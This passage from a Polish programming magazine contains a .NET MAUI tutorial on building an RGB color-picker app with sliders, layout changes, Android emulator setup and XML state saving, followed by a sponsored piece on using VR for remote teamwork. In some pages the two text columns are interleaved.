kretnie, żeby możliwe było ustawianie z ich pomocą wartości trzech
składowych RGB koloru.
Proponuję zacząć od nadania kontrolkom nazw, aby można było
się do nich odwołać z kodu C# w klasie MainPage. Ustawmy nazwy
suwaków tak, żeby odpowiadały składowym koloru, z którymi będą
związane: sliderR, sliderG i sliderB. Musimy też nadać nazwę
prostokątowi. Nazwy są ważne, bo bez nich nie będziemy mogli od-
czytywać lub modyfikować własności kontrolek. Aby nadać nazwę
elementowi XAML reprezentującemu kontrolkę, trzeba ustalić war-
tość jego atrybutu x:Name (Listing 2).
Listing 2. Nazwy w elementach XAML widoczne są w klasie MainPage jako pola
<Rectangle
x:Name="rectangle"
Grid.Row="0"
HeightRequest="300"
Fill="Black" />
<Slider
x:Name="sliderR"
Grid.Row="1" />
<Slider
x:Name="sliderG"
Grid.Row="2" />
<Slider
x:Name="sliderB"
Grid.Row="3" />
Kolejnym krokiem będzie związanie z suwakami metody zdarze-
niowej reagującej na zmianę ich pozycji. Kod tej metody powinien
znaleźć się w klasie KoloryMAUI.MainPage. Jest to klasa wskazana
w atrybucie x:Class elementu Page kodu XAML. Klasa ta, razem
z kodem XAML, jest zatem częścią warstwy widoku. Często używa
się na jej określenie sformułowania code-behind, czyli „kod stojący za
widokiem”. W kontekście MVVM określenie to ma negatywny wy-
dźwięk, bo zgodnie z najbardziej rygorystyczną egzegezą tego wzorca

{ WWW.PROGRAMISTAMAG.PL } <11>
BIBLIOTEKI I NARZĘDZIA

projekt aplikacji z graficznym interfejsem użytkownika (WPF, UWP

lub MAUI) w ogóle nie powinien zawierać code-behind. To ozna-
cza porzucenie mechanizmu zdarzeń na rzecz wiązań z niżej leżącą
warstwą.
Obecna wersja Visual Studio 2022 nie umożliwia jeszcze tworze-
nia metody zdarzeniowej z poziomu widoku projektowania. Dodaj-
my więc samodzielnie odpowiedni atrybut do elementu reprezentu-
jącego pierwszy suwak (Listing 3), wskazując nazwę metody, którą
następnie musimy również sami dodać do klasy MainPage z pliku
MainPage.xaml.cs. Do nowej metody wstawmy polecenie zmieniają-
ce kolor prostokąta na ceglany (Listing 4). To oczywiście tylko tym-
Rysunek 9. Zmiana koloru po przesunięciu suwaka
czasowe rozwiązanie, dzięki któremu sprawdzimy, czy mechanizm
zdarzeń w ogóle działa.

Listing 3. Związanie metody ze zdarzeniem kontrolki w kodzie XAML PASEK INSPEKCJI

<Slider Przy okazji zwróćmy uwagę na pasek inspekcji widoczny po środku
x:Name="sliderR"
Grid.Row="1" górnej krawędzi okna aplikacji uruchomionej w trybie debugowa-
ValueChanged="slider_ValueChanged" /> nia. Można go przesuwać i zwinąć, jeżeli przeszkadza. Zawiera sie-
Listing 4. Zmiana pozycji najwyższego suwaka spowoduje zmianę koloru dem ikon kontrolujących inspekcję kodu XAML w trakcie działania
prostokąta aplikacji. Na razie nie wszystko jednak działa. Kliknięcie pierwszych
private void slider_ValueChanged(object sender, EventArgs e)
dwóch ikon otwiera podokna Visual Studio. Pierwsza ikona otwie-
{ ra podokno o nazwie Dynamiczne drzewo wizualne (ang. Live Visual
rectangle.Fill = Brush.Firebrick;
} Tree) zawierające aktualizowane na bieżąco drzewo kontrolek XAML
działającej aplikacji. W drzewie tym widoczne są nie tylko kontrolki
Wykorzystany przez nas prostokąt można pokolorować, zmieniając wstawione do kodu XAML projektu, ale również te, z których te kon-
zarówno jego brzeg (atrybut/własność Stroke), jak i wypełnienie trolki są zbudowane. Każdy element jest wymieniony z nazwy (jeżeli
(Fill). My zmieniamy tylko wypełnienie. Przekonajmy się o tym, ją ma) i typu podanego w nawiasach kwadratowych (Rysunek 10).
kompilując projekt, uruchamiając aplikację (klawisz F5) i zmieniając Warto zwrócić uwagę, że to podokno ma pasek narzędzi z ikonami
pozycję pierwszego suwaka (Rysunek 9). podobnymi, jak do tych z paska inspekcji dodanego do okna apli-

Rysunek 10. Drzewo kontrolek XAML dla działającej aplikacji oraz aktualizowana na żywo lista własności

<12> { 2 / 2022 < 101 > }


kacji uruchomionego w trybie debugowania (m.in. ikonę pozwala-
jącą usunąć pasek z aplikacji oraz ikonę pozwalającą na ogranicze-
nie pokazywanych elementów do tych zdefiniowanych w projekcie).
W przyszłości obok podokna z drzewem elementów XAML warto
będzie ustawić podokno Eksplorator własności na żywo (ang. Live
Property Explorer), które pozwoli przejrzeć stan zaznaczonej kon-
trolki podczas działania aplikacji (na razie jest jednak puste). Dla
wygody okna te można także odpiąć od głównego okna Visual Stu-
dio i ustawić obok okna debugowanej aplikacji. Druga ikona uru-
chamia podgląd interfejsu aplikacji na żywo (podokno Podgląd na
żywo XAML widoczne na Rysunku 10), które może być szczególnie
wygodne, gdy korzystamy z rzeczywistego urządzenia podłączone-
go do komputera kablem USB. Kolejne trzy ikony to przełączniki.
Pierwszy włącza i wyłącza tryb selekcji w oknie debugowanej apli-
kacji. W trybie selekcji powinniśmy móc zaznaczać poszczególne
elementy XAML, z których jest zbudowany interfejs. Wskazanie jed-
nego z nich w oknie aplikacji odzwierciedlane jest także w drzewie
kontrolek. Na razie to jednak nie działa. Drugi przełącznik pokazuje
lub ukrywa strukturę interfejsu, uwidaczniając szczegóły elementów
kontrolujących ułożenie kontrolek. W przypadku używanej przez nas
siatki można dzięki temu zobaczyć jej podział na wiersze i kolumny.
Natomiast użycie trzeciego przełącznika powoduje, że w podoknach
z drzewem elementów oraz podglądu własności na żywo powin-
ny być pokazywane kontrolki mające aktualnie „focus”. To jednak
na razie również nie działa. Dwie ostatnie ikony pokazują informacje
o stanie aplikacji. Szczególnie ważna jest pierwsza z nich (przedostat-
nia ze wszystkich ikon), pokazująca liczbę błędów wiązania. My jed-
nak nie korzystamy z tego mechanizmu w tej aplikacji (tym zajmie-
my się w kolejnym artykule). Ostatnia ikona pokazuje jedynie, czy
możliwe jest skorzystanie z przeładowania aplikacji na gorąco – nowa
umiejętność Visual Studio 2022.
KONIEC DZIEŁA
Wróćmy do projektu i zwiążmy utworzoną przed chwilą metodę
zdarzeniową z dwoma pozostałymi suwakami. Wystarczy w kodzie
XAML skopiować atrybut ValueChanged z przypisaną nazwą funk-
cji do elementów sliderG i sliderB. Aby aplikacja uzyskała zapla-
nowaną funkcjonalność, metoda musi zmieniać kolor prostokąta
odpowiednio do bieżących pozycji suwaków. Musimy zatem odczy-
tać ich własności Value, ustalić na ich podstawie kolor i przypisać
go do własności Fill prostokąta. Wartość Value jest typu double,
podobnie jak wiele własności odpowiadających za pozycję i wygląd
w WPF, UWP i MAUI (w odróżnieniu od starszej technologii Win-
dows Forms). Domyślnie przyjmuje wartości z zakresu od 0 do 1 (do-
myślne wartości własności Minimum i Maximum). Taki zakres wartości
nam odpowiada, więc nie będziemy go zmieniać. Alternatywą była-
by zmiana zakresu na 0–255 i ustalanie koloru z użyciem wartości
typu byte (kolor i tak jest przechowywany w czterech bajtach: trzy
składowe RGB i nieprzezroczystość w kanale alfa), ale zostańmy przy
liczbach rzeczywistych.
Zmieńmy metodę zdarzeniową zgodnie ze wzorem z Listingu 6.
Użyta w niej klasa Color należy do przestrzeni nazw Microsoft.
Maui.Graphics. Tę przestrzeń należy dodać do sekcji poleceń using
na początku pliku MainPage.xaml.cs. Można to łatwo zrobić, klikając
{ WWW.PROGRAMISTAMAG.PL }
/ Pierwsze spojrzenie na .NET MAUI /
na nazwę klasy w kodzie (z czerwonym podkreśleniem) i naciskając
kombinację klawiszy Alt+Enter lub Ctrl+. (kropka). Należy wówczas
zwrócić uwagę, żeby dodać właściwą przestrzeń nazw, bo klasa o tej
samej nazwie zdefiniowana jest również w przestrzeniach System.
Drawing i Android.Graphics, których propozycje również zoba-
czymy. Ponadto, aby zsynchronizować początkowy kolor prostokąta
z pozycją suwaków, po uruchomieniu programu wywołajmy metodę
sliderR_ValueChanged z konstruktora klasy MainPage (Listing 6).
W nowszych wersjach VS 2022 (pod koniec stycznia br. wyszła wersja 17.1.0 Preview
3.0) plik MainPage.cs.xaml wygląda nieco inaczej. Nie ma sekcji using, która jest
zarządzana domyślnie przez dodawanie globalnych przestrzeni nazw dla wszystkich
plików z kodem C#. Ponadto, zamiast przestrzeni nazw otoczonej nawiasami klamro-
wymi, na początku pliku znajduje się tylko formuła namespace KoloryMAUI;, która
oznacza, że cała zawartość pliku należy do przestrzeni KoloryMAUI.
Listing 5. Zmiana koloru prostokąta w zależności od pozycji suwaków
using System;
using Microsoft.Maui.Controls;
using Microsoft.Maui.Essentials;
using Microsoft.Maui.Graphics;
namespace KoloryMAUI
{
public partial class MainPage : ContentPage
{
public MainPage()
{
InitializeComponent();
slider_ValueChanged(null, null);
}
private void slider_ValueChanged(object sender,
EventArgs e)
{
Color color = Color.FromRgb(
sliderR.Value,
sliderG.Value,
sliderB.Value);
rectangle.Fill = new SolidColorBrush(color);
}
}
}
Osoby, które zaczynają naukę C#, znając już C++, mogą mieć poważne
wątpliwości co do metody z Listingu 5, widząc w niej źródło wycieku
pamięci. Wprawdzie na platformie .NET zarządzaniem pamięcią zaj-
muje się garbage collector (odśmiecacz) i cyklicznie usuwa z pamięci
wszystkie obiekty, do których nie ma już referencji, jednak także w C#
ciągłe tworzenie nowych obiektów może nie być najlepszym rozwią-
zaniem. Tworzenie nowego obiektu typu SolidColorBrush (typ re-
ferencyjny) przy każdym poruszeniu suwakiem jest bowiem sporym
wyzwaniem dla garbage collectora, który musi wówczas zwalniać
z pamięci poprzednio używane obiekty. Lepiej byłoby modyfikować
własność opisującą kolor w istniejącym obiekcie. Jednak w pierwszej
aplikacji zostawmy ten kod w takiej postaci, w jakiej jest w tej chwili –
chodzi teraz przede wszystkim o oswojenie kontrolek MAUI.
URUCHAMIANIE W SYSTEMIE ANDROID
Jeżeli instalując Visual Studio 2022 Preview, wybraliśmy także ze-
staw pakietów Xamarin, zainstalowane zostały narzędzia do two-
rzenia wirtualnych urządzeń z systemem Android. W przeciwnym
razie warto zrobić to teraz. Jeżeli wcześniej nie tworzyliśmy żadne-
go projektu MAUI lub Xamarin i nie podłączyliśmy do komputera
<13>
BIBLIOTEKI I NARZĘDZIA

smartfona z systemem Android, w liście dostępnych urządzeń będzie

jedynie pozycja Emulator systemu Android. Na marginesie: na żad-
nym z testowanych przeze mnie komputerów VS nie zobaczył zapi-
sanych wcześniej na dysku wirtualnych urządzeń utworzonych za
pomocą innych narzędzi, np. Android Studio, ale jeżeli uruchomimy
je w emulatorze, wówczas pojawiają się także w opcjach uruchamia-
nia VS. Wybranie pozycji Emulator systemu Android spowoduje uru-
chomienie menedżera urządzeń z systemem Android (Rysunek 11),
który można uruchomić także z menu Narzędzia, Android, Android
Device Manager… i który proponuje utworzenie urządzenia Pixel 5
z systemem Android w wersji 11. Aby to zrobić, kliknijmy po pro-
stu przycisk Create. Warto także stworzyć urządzenie z niższą wersją
Androida. Zgodnie z obecnymi deklaracjami najniższą obsługiwaną
przez .NET MAUI wersją jest Android 5.0 (API 21). Po utworzeniu
wirtualnego urządzenia, co zajmie dłuższą chwilę, możemy urucho-
mić emulator. W tym momencie może pojawić się komunikat in-
formujący o niewłączonej funkcji Hyper-V. W takiej sytuacji trzeba
z menu systemu Windows uruchomić narzędzie Funkcje systemu
Windows i włączyć funkcję Hyper-V oraz platformę funkcji Hype-
rvision systemu Windows (Rysunek 12). Konieczne może być jednak
wcześniejsze włączenie wsparcia dla wirtualizacji w systemie BIOS.
Informacje o stanie tej funkcji można odczytać za pomocą polecenia Rysunek 12. Hyper-V jest niezbędna do działania emulatorów urządzeń z systemem
Android
systeminfo uruchomionego w linii komend.

Rysunek 11. Tworzenie AVD z poziomu VS

<14> { 2 / 2022 < 101 > }

 / Pierwsze spojrzenie na .NET MAUI /

Teraz wreszcie możemy z listy urządzeń w pasku narzędzi VS tości okna) nie jest jednoznacznie określona, przez co gwiazdka w
wybrać Pixel 5 – API 30 (Android 11.0 – API 30) i trzymając kciuki, definicji wierszy nie mogłaby skutecznie zadziałać. Na koniec nale-
kliknąć Uruchom w pasku narzędzi VS. Warto wcześniej upewnić się, ży także usunąć znacznik HeightRequest w elemencie Rectangle,
że platforma jest odpowiednia, tj. że wybrana jest pozycja Platforma żeby prostokąt mógł wykorzystać całe miejsce w pierwszym wierszu.
– net6.0-android. Tym razem kompilacja i wdrożenie potrwają dłu- Wszystkie zmiany zaznaczone są w Listingu 6.
żej, bo pakiet aplikacji przesyłany i wdrażany jest na emulowanym
Listing 6. „Uelastycznienie” ułożenia kontrolek
systemie. A ten proces w przypadku projektów MAUI też bywa ka-
pryśny. Czasem trzeba przebudować projekt (Ctrl+Shift+B), a cza- <ContentPage
xmlns="http://schemas.microsoft.com/dotnet/2021/maui"
sem zmienić platformę na inną i wrócić do Androida, żeby kompila- xmlns:x="http://schemas.microsoft.com/winfx/2009/xaml"
cja i wdrożenie zadziałało. Po uruchomieniu aplikacji (Rysunek 13), x:Class="KoloryMAUI.MainPage"
BackgroundColor="{DynamicResource SecondaryColor}" >
jeżeli wielkość ekranu urządzenia jest niewielka, może się okazać, że
<ScrollView>
trzeba będzie zmienić wysokość prostokąta, żeby widać było wszyst- <Grid
kie suwaki. Może być też tak, że pod suwakami zostaje dużo wolnego RowSpacing="25"
RowDefinitions="*,Auto,Auto,Auto"
miejsca. Za chwilę zmienimy nieco kod XAML, aby interfejs stał się Padding="{OnPlatform iOS='30,60,30,30',
Default='30'}" >
bardziej elastyczny i wysokość prostokąta dopasowywała się do wol-
nego miejsca. <Rectangle
x:Name="rectangle"
Grid.Row="0"
HeightRequest="300"
Fill="Black" />
<Slider
x:Name="sliderR"
Grid.Row="1"
Maximum="255"
ValueChanged="slider_ValueChanged" />
<Slider
x:Name="sliderG"
Grid.Row="2"
Maximum="255"
ValueChanged="slider_ValueChanged" />
<Slider
x:Name="sliderB"
Grid.Row="3"
Maximum="255"
ValueChanged="slider_ValueChanged" />

</Grid>
</ScrollView>
</ContentPage>

Jeżeli teraz uruchomimy aplikację, zobaczymy, że zawartość wypeł-

nia cały ekran. Co więcej, jeżeli uruchomimy ją pod Windows i bę-
dziemy zmieniać rozmiar okna, rozmiary kontrolek będą się do nie-
go dopasowywać.
Skoro już uporządkowaliśmy widok, możemy go nieco rozbudo-
wać. Dodajmy z prawej strony każdego suwaka etykietę prezentującą
Rysunek 13. Aplikacja uruchomiona w emulatorze smartfona z system Android
wartość odpowiedniej składowej koloru. Dla etykiet przeznaczmy
osobną kolumnę w siatce. Suwaki będą w pierwszej, a etykiety w dru-
giej, mniejszej kolumnie o ustalonej szerokości. Element Rectangle

ZMIANA UKŁADU KONTROLEK
Jeszcze kilka miesięcy do premiery .NET MAUI, więc nadal nie
wszystko jest gotowe. Nie ma na przykład znanego z Xamarin i WPF
elementu DockLayout, który pozwoliłby na przyklejenie suwaków
do „ścian” okna. Być może pojawi się też wprowadzony do UWP
element RelativePanel. Zostańmy zatem przy siatce (Grid alias
GridLayout), ale wprowadźmy kilka zmian, które uczynią ułożenie
kontrolek bardziej elastycznym. W tym celu w atrybucie RowDefi-
nitions definiującym wiersze w elemencie Grid zastąpmy pierwszą
wartość Auto przez gwiazdkę, co spowoduje, że pierwszy wiersz (ten
z prostokątem) zajmie całą przestrzeń niezajętą przez trzy pozostałe
(w nich są suwaki). Usuńmy także element ScrollView, który umoż-
liwia przewijanie zawartości, powodując, że wysokość strony (zawar-
będzie natomiast rozciągał się na obie kolumny. Odpowiednie zmia-
ny w kodzie XAML zostały wyróżnione w Listingu 7. Zmieniona
musi zostać także metoda zdarzeniowa – należy z niej bowiem teraz
aktualizować wartości pokazywane na etykietach (Listing 8).
Listing 7. Dodanie kolumny z etykietami
<ContentPage
xmlns="http://schemas.microsoft.com/dotnet/2021/maui"
xmlns:x="http://schemas.microsoft.com/winfx/2009/xaml"
x:Class="KoloryMAUI.MainPage"
BackgroundColor="{DynamicResource SecondaryColor}" >
<Grid RowSpacing="25" RowDefinitions="*,Auto,Auto,Auto"
ColumnSpacing="25" ColumnDefinitions="*,Auto"
Padding="{OnPlatform iOS='30,60,30,30',
Default='30'}" >

{ WWW.PROGRAMISTAMAG.PL } <15>
BIBLIOTEKI I NARZĘDZIA

<Rectangle ki nie mają minimalnej szerokości i „znikają”. Możemy jednak temu za-
x:Name="rectangle"
Grid.Row="0" Grid.ColumnSpan="2"
radzić, ustawiając szerokość drugiej kolumny na sztywno zamiast do-
Fill="Black" /> pasowywać ją do zawartości komórek: ColumnDefinitions="*,65".
<Slider
x:Name="sliderR"
Grid.Row="1"
Maximum="255" ZAPISYWANIE I ODTWARZANIE STANU
ValueChanged="slider_ValueChanged" />
<Label
APLIKACJI
x:Name="labelR"
WidthRequest="65" Zachowaniem, którego oczekujemy od nowoczesnych aplikacji, jest
Grid.Row="1" Grid.Column="1" odtwarzanie stanu aplikacji po jej zamknięciu i ponownym urucho-
HorizontalTextAlignment="End"
VerticalTextAlignment="Center" mieniu. W przypadku tak prostej aplikacji jak nasza, w której stan
Text="0" TextColor="Red" FontSize="35" />
<Slider
aplikacji to w istocie trzy wartości typu byte, do zapisania jej stanu
x:Name="sliderG" w zupełności wystarczy prosty plik tekstowy, np. w formacie XML.
Grid.Row="2"
Maximum="255" Niestety mechanizm ustawień aplikacji oferowany przez platfor-
ValueChanged="slider_ValueChanged" /> mę .NET w aplikacjach Windows Forms i WPF nie jest dostępny
<Label
x:Name="labelG" w MAUI (miejmy nadzieję, że tylko na razie). Zamiast tego sami za-
WidthRequest="65" piszmy stan aplikacji do pliku XML. To budzi niepokój, bo systemy
Grid.Row="2" Grid.Column="1"
HorizontalTextAlignment="End" plików w obu testowanych systemach są zupełnie inaczej zorganizo-
VerticalTextAlignment="Center" wane. Na szczęście .NET MAUI działa na bazie .NET 6, które ujed-
Text="0" TextColor="Green" FontSize="35" />
<Slider nolica i rozwiązuje wiele spraw, w tym obsługę plików.
x:Name="sliderB"
Licząc na pomoc .NET 6, a konkretnie technologii Linq to XML,
Grid.Row="3"
Maximum="255" spróbujmy samodzielnie przygotować proste metody statyczne zapi-
ValueChanged="slider_ValueChanged" />
<Label
sujące i odczytujące stan aplikacji w pliku XML (Listing 9). Aby utrzy-
x:Name="labelB" mać porządek, umieściłem je w osobnej klasie Settings zapisanej do
WidthRequest="65"
Grid.Row="4" Grid.Column="1" nowego pliku Settings.cs. Aby utworzyć plik z tą klasą w oknie Eks-
HorizontalTextAlignment="End" plorator rozwiązań, w drzewie plików kliknąłem prawym klawiszem
VerticalTextAlignment="Center"
Text="0" TextColor="Blue" FontSize="35" /> myszy pozycję odpowiadającą projektowi i z menu kontekstowego,
</Grid> które wówczas się pojawiło, wybrałem Dodaj, Klasa…. W oknie dia-
</ContentPage>
logowym należy wskazać nazwę Settings.cs i kliknąć przycisk Dodaj.
Listing 8. Aktualizacja tekstu pokazywanego przez etykiety z kodu C# Zastanawiałem się przez chwilę, w jaki sposób przekazywać do meto-
private void slider_ValueChanged(object sender, EventArgs e)
dy Settings.Save i odbierać z metody Settings.Load stan aplikacji.
{ Rozważałem użycie klasy Color, ale to utrudniałoby ewentualną póź-
Color color = Color.FromRgb(
sliderR.Value, niejszą separację modelu i widoku. Dlatego zdecydowałem się wyko-
sliderG.Value, rzystać trójelementową krotkę.
sliderB.Value);
rectangle.Fill = new SolidColorBrush(color); Listing 9. Metody pomagające w przechowywaniu stanu aplikacji
labelR.Text = Math.Round(255 * color.Red).ToString();
labelG.Text = Math.Round(255 * color.Green).ToString();
using System.Xml.Linq;
labelB.Text = Math.Round(255 * color.Blue).ToString();
using System.Globalization;
}
namespace KoloryMAUI
{
internal static class Settings
{
private static string filePath = Path.Combine(
Environment.GetFolderPath(
Environment.SpecialFolder.UserProfile),
"kolory.xml");
private static IFormatProvider formatProvider =
CultureInfo.InvariantCulture;

public static void Save(

double r, double g, double b)
{
XDocument xml = new XDocument(
new XElement("ustawienia",
new XElement(
"r",
r.ToString(formatProvider)),
new XElement(
Rysunek 14. Wzbogacony interfejs aplikacji "g",
g.ToString(formatProvider)),
new XElement(
Spodziewany efekt widoczny jest na Rysunku 14. I dokładnie tak działa "b",
aplikacja uruchamiana w Windows. Jednak po uruchomieniu w An- b.ToString(formatProvider))

droidzie wygląd interfejsu się „rozjeżdża” – kontrolki nie są widoczne

w odpowiednich kolumnach. Przyczyną jest to, że w Androidzie suwa-

<16> { 2 / 2022 < 101 > }

 / Pierwsze spojrzenie na .NET MAUI /

) private bool updateGUI = true;

);
xml.Save(filePath); private void slider_ValueChanged(object sender,
} EventArgs e)
{
public static (double r, double g, double b) Load() if (!updateGUI) return;
{ Color color = Color.FromRgb(
if (!File.Exists(filePath)) sliderR.Value,
return (0.0, 0.0, 0.0); sliderG.Value,
try sliderB.Value);
{ rectangle.Fill = new SolidColorBrush(color);
XDocument xml = XDocument.Load(filePath); labelR.Text =
double r = double.Parse( Math.Round(255 * color.Red).ToString();
xml.Root.Element("r").Value, labelG.Text =
formatProvider); Math.Round(255 * color.Green).ToString();
double g = double.Parse( labelB.Text =
xml.Root.Element("g").Value, Math.Round(255 * color.Blue).ToString();
formatProvider); Settings.Save(
double b = double.Parse( sliderR.Value,
xml.Root.Element("b").Value, sliderG.Value,
formatProvider); sliderB.Value);
return (r, g, b); }
} }
catch }
{
return (0.0, 0.0, 0.0);
}
} Po uruchomieniu i zamknięciu aplikacji w katalogu domowym użyt-
} kownika (zarówno w Windows, jak i na innych systemach) pojawi się
}
plik kolory.xml, którego zawartość widoczna jest w Listingu 11. Przy
kolejnym uruchomieniu aplikacji plik ten zostanie odczytany i w ten
W Listingu 10 pokazano użycie tych metod w klasie MainPage. Miej- sposób przywrócony zostanie stan aplikacji z chwili zamknięcia.
sce, w którym plik jest wczytywany, jest dość oczywiste – jest nim
Listing 11. Plik XML przechowujący stan aplikacji
konstruktor klasy. Warto zwrócić uwagę tylko na użycie flagi up-
dateGUI, która zapobiega wielokrotnemu modyfikowaniu kontro- <?xml version="1.0" encoding="utf-8"?>
<!--Zapisano: 13.01.2022 14:41:08-->
lek. Natomiast miejsce zapisu wydaje się niezbyt fortunne, bo plik <ustawienia>
XML zapisujemy w metodzie zdarzeniowej po każdej zmianie koloru <r>0.718</r>
<g>1</g>
w wyniku poruszenia suwakami. Jest tak, ponieważ w pliku Main- <b>0.546</b>
</ustawienia>
Page.xaml określamy jedynie zawartość okna i nie mamy możliwo-
ści zasubskrybowania zdarzenia informującego o jego zamknięciu
(w Windows) lub zdjęcia aktywności z ekranu (w systemach An-
PODSUMOWANIE
droid). Można sobie oczywiście z tym poradzić, ale wówczas trzeba
wyjść poza przyjęte w tym artykule ramy, w których edytujemy tylko Z entuzjazmem kibicuję .NET MAUI. Liczę, że uda się tej technologii
pliki MainPage.xaml i MainPage.xaml.cs. zdobyć popularność wystarczającą do tego, żeby była przez Microsoft
rozwijana i wspierana przez dłuższy czas. Podoba mi się idea ujed-
Listing 10. Zapis i odtworzenie stanu aplikacji
nolicenia narzędzi służących do rozwijania oprogramowania dla róż-
namespace KoloryMAUI nych platform. Zarówno z estetycznego, jak i z biznesowego punktu
{
public partial class MainPage : ContentPage widzenia wydaje się to dobrym pomysłem. Jeżeli w momencie wy-
{ dania możliwości MAUI będą na Windows dorównywały WPF, a na
public MainPage()
{ Androidzie i iOS – Xamarin, jest na to realna szansa.
InitializeComponent();
W następnym numerze powrócimy do tego projektu, realizują-
var color = Settings.Load(); cąc go jednak zgodnie z architekturą MVVM, co oznacza korzysta-
updateGUI = false;
sliderR.Value = color.r; nie z wiązań, zachowań i innych bardziej zaawansowanych technik.
sliderG.Value = color.g; Sprawdzimy, czy ich znajomość przyda się nam w przypadku MAUI.
updateGUI = true;
sliderB.Value = color.b;
}

JACEK MATULEWSKI
Fizyk i informatyk. Kieruje Pracownią Gier Terapeutycznych „GameLab” działającą w Interdyscyplinarnym Centrum Nowo-
czesnych Technologii UMK w Toruniu. Zatrudniony jest w Katedrze Informatyki Stosowanej na Wydziale Fizyki, Astrono-
mii i Informatyki Stosowanej. Habilitował się z optyki kwantowej. Zajmuje się projektowaniem, tworzeniem i badaniem gier
terapeutycznych, tworzeniem oprogramowania na potrzeby badań eksperymentalnych i klinicznych, a także oprogramowania
korzystającego z interakcji wzrokowej (z użyciem eyetrackerów) m.in. dla osób niepełnosprawnych.

{ WWW.PROGRAMISTAMAG.PL } <17>
Virtual Reality lekiem na pandemiczne wyzwania
Wirtualna rzeczywistość (z ang. VR – Virtual Reality) aktualnie jest w rozkwi-
cie. Ta technologia otwiera całkowicie nowe możliwości komunikacji i współ-
pracy pomiędzy ludźmi. W dobie transformacji, z którą mamy aktualnie do
czynienia, to nowatorskie narzędzie ma szansę zrewolucjonizować sposób,
w jaki pracujemy, uczymy się czy też spędzamy wolny czas. Wirtualna rze-
czywistość pozwala przeżyć doznania niespotykane nawet w realnym świe-
cie. Czy to początek rewolucji? Czy branża IT będzie miała wpływ na kreowa-
nie środowiska, w jakim przyjdzie nam pracować w przyszłości?

PIERWSZE DNI PRACY Z DOMU
Krótko przed dniem 11 marca 2020 r., kiedy Światowa Organizacja
Zdrowia (WHO) ogłosiła pandemię COVID19, dla większości kor-
poracji otworzył się rozdział, zatytułowany „praca zdalna”.
W tamtych warunkach nowa perspektywa brzmiała całkiem
rozsądnie. Można było wymienić wiele plusów takiego rozwiąza-
nia: praca z domu jest bardzo wygodna, później wstajemy z łóżka,
oszczędzamy czas i pieniądze na dojazdy do pracy, jesteśmy w stanie
lepiej zaplanować logistykę przedszkolną/szkolną oraz swojego czasu
wolnego. Z biznesowego punktu widzenia pracodawca miał mniejsze
koszty operacyjne związane z wynajmem miejsca pracy czy znacznie
ograniczone koszty administracyjne (zaopatrzenie biura, wysyłki ku-
rierskie itp.), kończąc na aspekcie ekologii, gdzie brak konieczności
dojazdu do pracy oznacza mniejszą emisję spalin w miastach.
Taki stan rzeczy pokazał również, jak ważny jest dostęp do szyb-
kich sieci, w tym najnowszej generacji 5G. Nagle wszyscy „przesie-
dliśmy się” przed komputery. I to nie tylko pracownicy biurowi, ale
i cała rzesza uczniów czy pracowników administracji.
to wystarczy? Bez ich pielęgnowania komunikacja zacznie kuleć, a ta
jest najważniejszym czynnikiem przy realizacji nawet najmniejszych
projektów. A co z nowym pracownikiem? Jak zbudować komunika-
cję, nawiązać więź i dać poczucie sprawczości bez znajomości kultury
firmy, lokalnego zarządu i własnego zespołu?
JAK MIEĆ CIASTKO I ZJEŚĆ CIASTKO
Praca zdalna miała być idealnym rozwiązaniem na miarę XXI wie-
ku. Aspekty ekologiczne, oszczędność czasu, a przez to większa wy-
dajność pracowników stała się nagle drugorzędna, w obliczu m.in.
depresji, problemów z ergonomią pracy (m.in. bóle kręgosłupa) czy
rozluźnienia relacji z drugim człowiekiem. Zaczęliśmy więc poszuki-
wać sposobu na to, aby zapobiec dalszemu pogłębianiu się codzien-
nego marazmu, tym bardziej że nikt już nie ma wątpliwości, iż praca
zdalna i hybrydowa na stałe weszły do oferty rynkowej firm. Jedną
z odpowiedzi na te wyzwania wydaje się być zastosowanie w codzien-
nej pracy technologii VR.
W krakowskim oddziale firmy Nokia aktualnie prowadzimy testy
z wykorzystaniem gogli wirtualnej rzeczywistości. Dzisiejsza techno-

TO JUŻ DWA LATA
Czas jednak pokazał, jakie zagrożenia przyniosło przeniesienie pracy
do domu oraz do świata online. Przede wszystkim straciliśmy uwagę
pracownika. Jego zaangażowanie i przywiązanie do firmy widoczne
jest przede wszystkim u długoletnich pracowników. Czynnik mię-
dzyludzki, te nawiązane przez lata relacje są jeszcze silne i pozwalają
na tym budować dalszą współpracę i siłę zespołu. Tylko na jak długo
logia pozwala tworzyć w cyberświecie sale konferencyjne, do których
można przenieść swoje miejsce pracy wraz z domowym biurkiem,
czy wykorzystać do prezentacji wirtualne tablice, na których w czasie
rzeczywistym możemy kreślić swoje pomysły (Rysunek 1).
Awatar twojego współrozmówcy, tłumacząc dane zagadnienie,
jest w stanie gestykulować, a dzięki ciągłemu rozwojowi technolo-
gii VR już dziś jest możliwość odczytywania mimiki użytkownika
i przenoszenia jej bezpośrednio na twarz awatara.

<18> { MATERIAŁ INFORMACYJNY }

Rysunek 1. Przykładowa sesja burzy mózgów z wykorzystaniem wirtualnego pomieszczenia
oraz tablicy

Rysunek 2. Wirtualny „Daily Stand-up Meeting”

Codzienne spotkania zespołów, tj. „Daily Stand-up Meetings”,
dzięki zastosowaniu nowego narzędzia mogą odbywać się na stojąco
przy tablicy scrumowej, jak to miało miejsce jeszcze przed czasami
pandemii. Tym samym pracownik chwilowo odrywa się od biurka,
przy którym aktualnie spędza większą część dnia pracy (Rysunek 2).
Jak takie spotkanie wygląda, czytelnik może sprawdzić, oglądając
krótką prezentację dostępną pod adresem youtu.be/5B4gcbdFMHk.
Praca programisty z natury jest twórcza i wymaga dużego sku-
pienia, a ciągłe siedzenie przed monitorem, bez przerwy na small
talk czy możliwości zmiany otoczenia, obniża produktywność i de-
motywuje. Dlatego w wielu korporacjach, w czasach przedcovido-
wych, można było się zrelaksować, grając z kolegami np. na konsoli,
w 5-minutową partyjkę piłkarzyków czy ping ponga. Dzięki techno-
logii VR możemy przenieść również i ten aspekt do świata wirtualne-
go, mając nadzieję, że po krótkiej przerwie wrócimy do pracy z od-
świeżonym umysłem, gotowi na kolejne wyzwania dnia codziennego.
Integracja zespołów to kolejny bardzo ważny aspekt pracy, któ-
ry do tej pory był przez firmy starannie adresowany. Nowa rzeczy-
wistość i w tym temacie postawiła przed managerami czy zarządem
wiele wyzwań. I tak znowu, dzięki nowej technologii, można rozgry-
wać wspólnie ze znajomymi z pracy np. mecze w stanie nieważkości,
a idąc dalej, organizować koła zainteresowań rozgrywkami e-sporto-
wymi. Przykład wykorzystania gogli w wyżej wymienionych zastoso-
waniach świetnie obrazuje materiał filmowy dostępny pod adresem:
youtu.be/bPAHmvindEM.
